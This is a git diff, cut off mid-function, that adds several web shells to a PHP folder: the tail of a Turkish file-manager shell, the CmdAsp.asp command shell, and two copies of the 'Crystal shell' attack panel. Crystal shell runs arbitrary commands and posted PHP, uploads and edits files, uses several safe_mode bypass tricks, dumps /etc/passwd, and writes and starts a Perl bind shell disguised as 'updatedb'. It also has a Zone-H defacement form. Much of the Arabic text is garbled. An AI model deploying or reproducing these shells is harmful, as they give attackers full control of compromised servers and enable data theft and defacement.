+        echo " CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEY?TYRYLDY";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "
    
+      
    CHMOD:
+      
+      
+      

    
+      
    ";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "
     $file - indir - düzenle - ";
+echo "sil - $total_kb$total_kb2 - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "$fileperm";
+echo "
    \n";
+}else{
+echo "
    GYT>  $path/$file - DIR - Sil - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "$dirperm";
+echo " 
    \n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+echo "
    ------------------------------
    ";
+echo "
    Root Klasörüne Git
    ";
+echo "
    Linux Kök Dizinine Git
    ";
+if(file_exists("B:\\")){
+echo "
    B:\\
    ";
+} else {}
+if(file_exists("C:\\")){
+echo "
    C:\\
    ";
+} else {}
+if (file_exists("D:\\")){
+ echo "
    D:\\
    ";
+} else {}
+if (file_exists("E:\\")){
+ echo "
    E:\\
    ";
+} else {}
+if (file_exists("F:\\")){
+ echo "
    F:\\
    ";
+} else {}
+if (file_exists("G:\\")){
+ echo "
    G:\\
    ";
+} else {}
+if (file_exists("H:\\")){
+ echo "
    H:\\
    ";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "
    SERVER BYLGYLERY
    ";
+echo "
    $SERVER_SIGNATURE";
+echo "Software: $SERVER_SOFTWARE
    ";
+echo "Server IP: $SERVER_ADDR
    ";
+echo "
    ";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "
    Y?LEMLER
    ";
+echo "
    Dosya Gönder
    ";
+echo "
    Dosya Olu?tur
    ";
+echo "
    Klasör Olu?tur
    ";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "
    
+      
    Tüm haklary sahibi MafiABoY'a aittir
    ";
+?>
\ No newline at end of file
diff --git a/php/CmdAsp.asp.php.txt b/php/CmdAsp.asp.php.txt
new file mode 100644
index 0000000..169cf7a
--- /dev/null
+++ b/php/CmdAsp.asp.php.txt
@@ -0,0 +1,55 @@
+<++ CmdAsp.asp ++>
+<%@ Language=VBScript %>
+<%
+' --------------------o0o--------------------
+' File: CmdAsp.asp
+' Author: Maceo 
+' Release: 2000-12-01
+' OS: Windows 2000, 4.0 NT
+' -------------------------------------------
+
+Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+
+On Error Resume Next
+
+' -- create the COM objects that we will be using -- '
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+' -- check for a command that we have posted -- '
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+
+' -- Use a poor man's pipe ... a temp file -- '
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+End If
+
+%>
+
+
+
    " method="POST">
+
+
+
    
+
    +<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+
    
+<%
+If (IsObject(oFile)) Then
+' -- Read the output from our command and remove the temp file -- '
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If
+%>
+
+
+<-- CmdAsp.asp -->
diff --git a/php/Crystal shell.php b/php/Crystal shell.php
new file mode 100644
index 0000000..91d0334
--- /dev/null
+++ b/php/Crystal shell.php	
@@ -0,0 +1,1065 @@
+
+
+
+
+Crystal shell
+
+  
+
+
+ 
+
+
+
+  
+
+
    
+	
+		
    
+
     
    
+	
    
+
+	oCRYSTAL-H 
+	Crystal hack shellphp 2006-2007
    
+
    
+
+
+
    
+	
+	ON (secure)";
+
+
+}
+
+else {$safemode = false; $hsafemode = "OFF (not secure)";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
+else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
+echo("
    ");
+echo("Open base dir: $hopenbasedir");
+echo("
    ");
+echo "PostgreSQL: ";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "ON";}else{echo "OFF    ";}
+echo("
    ");
+echo "MSSQL: ";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "ON";}else{echo "OFF";}
+echo("
    ");
+echo "MySQL: ";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "ON"; } else { echo "OFF"; }
+echo("
    ");
+echo "PHP version: ".@phpversion()."";
+echo("
    ");
+echo "cURL: ".(($curl_on)?("ON"):("OFF"));
+
+echo("
    ");
+echo "Disable functions : ";
+if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+
    
+	
     
    
+
+	
+
    
+	
     
    
+
+    
+
+
+
+
    
+	
     
    
+	
    
+	
    
+
+
+
+		OS:  
    
+Server:  
+
+
    
+
+
+
    User: 
+
+	
+	
+	
+
+
    
+	    
+    1:
+
    
+
+
      Back 
+
+	?
+phpinfo2
+
+
+
+ Tools4
+
+
+
+  
+
+Decoderi
+
+
+
+  
+	
+	
+ByPass`
+
+
+
+  
+	
+SQLA
+
+
+
+ BindA 
+	
+	
+	
+help
+sabout
+
+?
    
+
    
+[j 
+
+
+	
+	server 
+	: 
+	
+
+
+
+
+
+	
+	
+	
+	CGI v:          
+	 HTTP v:  Mail
+admin:         
+
+	
+  
    
+
+
+
+
+	
+	
+	:  IP
+	 SERVER: 
+	
+	
+
+
+
+
+
+	        
+
+	
+	                
+	
+	
+port
+	: 
+	
+	
+	
+	
+
    
+CaOaCa Uai?a ?NIaE Caaa ?EN?CEa

    UOiOi CaaOEIIa
    C?C CNIE CaaOCUIE COUO Uai COa CaIiCN Caa?OI ECaa?a CaCON?
    ?OEUaN a? aUa?aCE CaIiCN   .    ";}
+if ($act == "bindport"){
+echo "
    
+/bin/bash
+Port
+
+
+
    ";
+}
+if ($act == "tools"){
+	echo "
    
+File to edit:
+
+
+
    ";
+ echo "
    
+
    
+
+
    ";
+echo "
    
+
    Download here from:
+
+-->>:
+
+
+
    ";
+}
+if ($act == "about") {echo "
    Coding by:

    Super-Crystal
    &
    Mohajer22
    -----
    Thanks 
    TrYaG Team 
     ArabSecurityCenter Team 
    CRYSTAL-H Version:0 Beta phpshell code
    Saudi Arabic  .    ";}
+
+if ($act == "bind") {echo "
    CRYSTAL-H:

    -Connect ?a ECaOUO Uai IiCN.
    .- EUI aCiEa CaOCa CaO?NiEE ECaaIaI
    .-E?Ia aCICE CaaE ?CE ?EOaE Uai
    nc -lp 3333E?ECEE CaaaY? - 
    CaO?NiEE EaUE CaEiNa 
    Bind port to  :
     bind shell ?aai?C ? a?   .    ";}
+
+if ($act == "command") {echo "
    CRYSTAL-H:

    aAIEiCN CaC?CaN CaICaOa  Select ------ x  COUO Uai CaIiCN
    .- ?C?C CNIE ?ECEa  CaC?CaN EaYO? ?I E?EYi ECaIiCN
    Command   .    ";}
+
+if ($act == "team") {echo "
    Arab Security Center Team

    Super-Crystal
    Medo-HaCKer
    Anaconda
    Alsb0r
     ReeM-HaCK 
    NoOFa 
     AL-Alame
    The YounG HackeR
    Anti-Hack
    Thanks  .    ";}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+
    
+
    Execute:
    
+";
+echo (" bypass safemode with copy ");
+echo "
    
+
    read file :
+
+
    ";
+echo (" bypass safemode with CuRl");
+echo "
    
+
    read file :
+
+
    ";
+echo (" bypass safemode with imap()");
+echo "
    
+
    
+
+
    ";
+echo (" bypass safemode with id()");
+echo "
    
+
    
+
+
    ";
+echo (" Exploit: error_log()");
+echo "
    
+
    
+
+
    ";
+}
+if ($act == "decoder"){
+echo (" replace Chr()");
+echo "
    
+
    
+
    
+
    ";
+}
+if ($act == "SQL"){
+echo ("   MySQL    ");
+echo "
    
+
     Username :
+\n
+password :
+\n
+\n
+
    ";
+}
+?>
+
+
    
+
+	
    
+	
+	
+	
+	
    
+	 
    
+	
     
+		
+			
    
+
+
+ Exploit: error_log() By * Super-Crystal  * 
+
+
+
+
+
+
     By  * Super-Crystal * TrYaG Team
    
+
+
+
+
    
+
+
+
    
+
    
+
+
+
    
+
    
+
+
+
+
    
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "
    ";
+                                                }
+                                        }
+
+                                break;
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "
    ".$str."
    ";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "
    ";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."
     
    " ;
+echo "
    ";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("
    Sorry... File
+".htmlspecialchars($u1p)." dosen't exists or you don't have
+access.
    ");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "
    Download - OK. (".$sizef."??)
    ";
+}
+else
+{
+print "
    Something is wrong. Download - IS NOT OK
    ";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+}
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "<" , $string);
+$string = str_replace(">" , ">" , $string);
+$content = $content . $string;
+}
+
+echo "
    Edit file: $ef 
    
+
+
    
+
    ";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "
    saved -OK!
    ";
+
+}
+
+if (isset($_POST['php'])){
+
+echo "
    eval code

    
+
    ";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "
    Results of PHP execution

    ";
+@eval(stripslashes($_POST['phpcode']));
+echo "
    ";
+
+}
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "
    Command: $cmd
    ";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "";}
+else{
+$directory = $directory . "";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "";}
+else{
+$directory = $directory . "";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "";}
+else{
+$file = $file . "";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "";}
+else{
+$file = $file . "";
+}
+$files = $files . $file;
+}
+
+}
+
+}
+echo $dires;
+echo $files;
+echo "
    NameTypeSizeLast accessLast changePermsWriteRead
    $filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "YesNoYesNo
    $filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "YesNoYes
    No

    ";
+
+echo "
+
    
+Command:
+Directory:
+
    ";
+if (ini_get('safe_mode') == 1){echo "
    SAFE MOD IS ON
    
+Including from here: "
+. ini_get('safe_mode_include_dir') . "
    Exec here: " . ini_get('safe_mode_exec_dir'). "    ";}
+?>
+
    
+	
    
+	< 

    
+
+	
    
+	
+	:: 
+	Executed command ::
    
+	
+Command:";
+?>
+		f
    
+	 
    
+	
    
+	
    
+		Selectg 
    Bind port toA
    
+    
+
+
+
+ 
+ 
+
+
+
    
+	
    
+
+	
+	
+	::Edit/Create
+	file::"
    
+	 CaEINiN ?CaCaOCA:

     ?a E?OU COa CaaaY Ca?i ENiI EINiNa Y?O
    ?EUI ?Ca? CaOUO Uai config.php aECa
    Edit
    OEUaN a? aCY?a EaC aIE?iCE CaaaY 
    ?CiOC ? C?C CNIE CaOCA aaY Y?O OU COaa aU CaCaEICI 
    ?EUI ?Ca? C?EE aCENiI washer-crystal.txt   .    ";}
+?>
+	
    
+	
     
    
+	
    	
+File to edit:
+
+
+
    ";
+?>
+	
    
+	
    
+                 NYU CaaaYCE:

    ?a EEIIiI CaaaY CaaNCI NYUa 
    ?EUI ?Ca? ?a ECaOUO Uai CaIiCN Caa?OI
    UPLOAD< .    ";}
+?>::
+	
+	
+					upload::Ņ
     
+		
+
+
+
+
    ";
+?>
+	
    	
+
+                  
     Defacer Zone-H
     
+
    
+ 					CRYSTAL-H:

    COa CaaUaa Defacer
    Caa??U CaaIEN? Victim
    ?OU CaCIENC? Ci a?U CaEUNa CaEi COEEaNEaC Attack Mode 
     OEE CaCIENC? Attack Reason 
    aCNOCa CaCIENC? sand   
     aNAia CIN CaEI?iNCE CaaNOaa ECaa??U Attacks On Hold.    ";}
+?>                 
    
+                  
+
+                  Defacer 
+
+					Zone-h
    
+                  
+                    
+                    
+                    
+                      
+                    
    
+                  
+                    
+                    
+                      
    
+                        
+                          
+                          
+                            
     
    
+                          
+                          
+                            
+							
+                          
+                            
+                          
+                            
+                            
    
+							::Defacer:::e
+							 
+							
    
+							::Victim:::e
+							 
    
+							
+							Attack Mode:e
+							
    
+							
+							Attack Reason:e
+							
    
+                          
+                          
+                            
     
    
+                        
+                          
+                          
+                            
    
+							  :  
+							
+L 
+							
+							Attacks On Hold
+							
+L

    
+
    
+	
    
+	
+	 yCrystal shell v. 1 beta  ©oded by TrYaG Team l Arab Security Center Team |securityCenter|
+	: Web x
     
    
+
+
    
+
+  
+  
+  
+    
+  
    
+      
+        
+        
+          
+          
+          
+          
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+          
    CRYSTAL-H
+			2006
    PPSCPCC
    1 
    2 3 4  5  6  7  8  
    9 10  11  12  1314 15 
    16  17  181920 21 22 
    23242526272829
    3031
    
+        
    
+
\ No newline at end of file
diff --git a/php/Crystal.php b/php/Crystal.php
new file mode 100644
index 0000000..ae925d5
--- /dev/null
+++ b/php/Crystal.php
@@ -0,0 +1,1127 @@
+
+
+
+
+Crystal shell
+
+  
+
+
+ 
+
+
+
+  
+
+
    
+	
+		
    
+
     
    
+	
    
+
+	öCRYSTAL-H 
+	Crystal hack shellphp 2006-2007
    
+
    
+
+
+
    
+	
+	ON (secure)";
+
+
+}
+
+else {$safemode = false; $hsafemode = "OFF (not secure)";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
+else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
+echo("
    ");
+echo("Open base dir: $hopenbasedir");
+echo("
    ");
+echo "PostgreSQL: ";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "ON";}else{echo "OFF    ";}
+echo("
    ");
+echo "MSSQL: ";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "ON";}else{echo "OFF";}
+echo("
    ");
+echo "MySQL: ";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "ON"; } else { echo "OFF"; }
+echo("
    ");
+echo "PHP version: ".@phpversion()."";
+echo("
    ");
+echo "cURL: ".(($curl_on)?("ON"):("OFF"));
+
+echo("
    ");
+echo "Disable functions : ";
+if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+
    
+	
     
    
+
+	
+
    
+	
     
    
+
+    
+
+
+
+
    
+	
     
    
+	
    
+	
    
+
+
+
+		OS:  
    
+Server:  
+
+
    
+
+
+
    User: 
+
+	
+	
+	
+
+
    
+	    
+    1:
+
    
+
+
      Back 
+
+	ğ
+phpinfo2
+
+
+
+ Tools4
+
+
+
+  
+
+Decoderi
+
+
+
+  
+	
+	
+ByPass`
+
+
+
+  
+	
+SQLÂ
+
+
+
+ Bind 
+	
+	
+	
+help
+sabout
+
+?
    
+
    
+[j 
+
+
+	
+	server 
+	: 
+	
+
+
+
+
+
+	
+	
+	
+	CGI v:          
+	 HTTP v:  Mail
+admin:         
+
+	
+  
    
+
+
+
+
+	
+	
+	:  IP
+	 SERVER: 
+	
+	
+
+
+
+
+
+	        
+
+	
+	                
+	
+	
+port
+	: 
+	
+	
+	
+	
+
    
+ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå

    ÚÒíÒí ÇáãÓÊÎÏã
    ÇĞÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑŞ
    æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ   .    ";}
+if ($act == "bindport"){
+echo "
    
+/bin/bash
+Port
+
+
+
    ";
+}
+if ($act == "tools"){
+	echo "
    
+File to edit:
+
+
+
    ";
+ echo "
    
+
    
+
+
    ";
+echo "
    
+
    Download here from:
+
+-->>:
+
+
+
    ";
+}
+if ($act == "about") {echo "
    Coding by:

    Super-Crystal
    &
    Mohajer22
    -----
    Thanks 
    TrYaG Team 
     ArabSecurityCenter Team 
    CRYSTAL-H Version:0 Beta phpshell code
    Saudi Arabic  .    ";}
+
+if ($act == "bind") {echo "
    CRYSTAL-H:

    -Connect Şã ÈÇáÖÛØ Úáì ÎíÇÑ.
    .- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ
    .-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì
    nc -lp 3333ÈßÊÇÈÉ ÇáãäİĞ - 
    ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá 
    Bind port to  :
     bind shell æåäíÆÇ ğ áß   .    ";}
+
+if ($act == "command") {echo "
    CRYSTAL-H:

    áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå  Select ------ x  ÇÖÛØ Úáì ÇáÎíÇÑ
    .- æÇĞÇ ÇÑÏÊ ßÊÇÈå  ÇáÇæÇãÑ ÈäİÓß ŞÏ ÊßÊİí ÈÇáÎíÇÑ
    Command   .    ";}
+
+if ($act == "team") {echo "
    Arab Security Center Team

    Super-Crystal
    Medo-HaCKer
    Anaconda
    Alsb0r
     ReeM-HaCK 
    NoOFa 
     AL-Alame
    The YounG HackeR
    Anti-Hack
    Thanks  .    ";}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+
    
+
    Execute:
    
+";
+echo (" bypass safemode with copy ");
+echo "
    
+
    read file :
+
+
    ";
+echo (" bypass safemode with CuRl");
+echo "
    
+
    read file :
+
+
    ";
+echo (" bypass safemode with imap()");
+echo "
    
+
    
+
+
    ";
+echo (" bypass safemode with id()");
+echo "
    
+
    
+
+
    ";
+echo (" Exploit: error_log()");
+echo "
    
+
    
+
+
    ";
+}
+if ($act == "decoder"){
+echo (" replace Chr()");
+echo "
    
+
    
+
    
+
    ";
+}
+if ($act == "SQL"){
+echo ("   MySQL    ");
+echo "
    
+
     Username :
+\n
+password :
+\n
+\n
+
    ";
+}
+?>
+
+
+
+
    
+
+	
    
+	
+	
+	
+	
    
+	 
    
+	
     
+		
+			
    
+
+
+ Exploit: error_log() By * Super-Crystal  * 
+
+
+
+
+
+
     By  * Super-Crystal * TrYaG Team
    
+
+
+
+
    
+
+
+
    
+
    
+
+
+
    
+
    
+
+
+
+
    
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "
    ";
+                                                }
+                                        }
+
+                                break;
+
+
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "
    ".$str."
    ";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "
    ";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."
     
    " ;
+echo "
    ";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("
    Sorry... File
+".htmlspecialchars($u1p)." dosen't exists or you don't have
+access.
    ");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
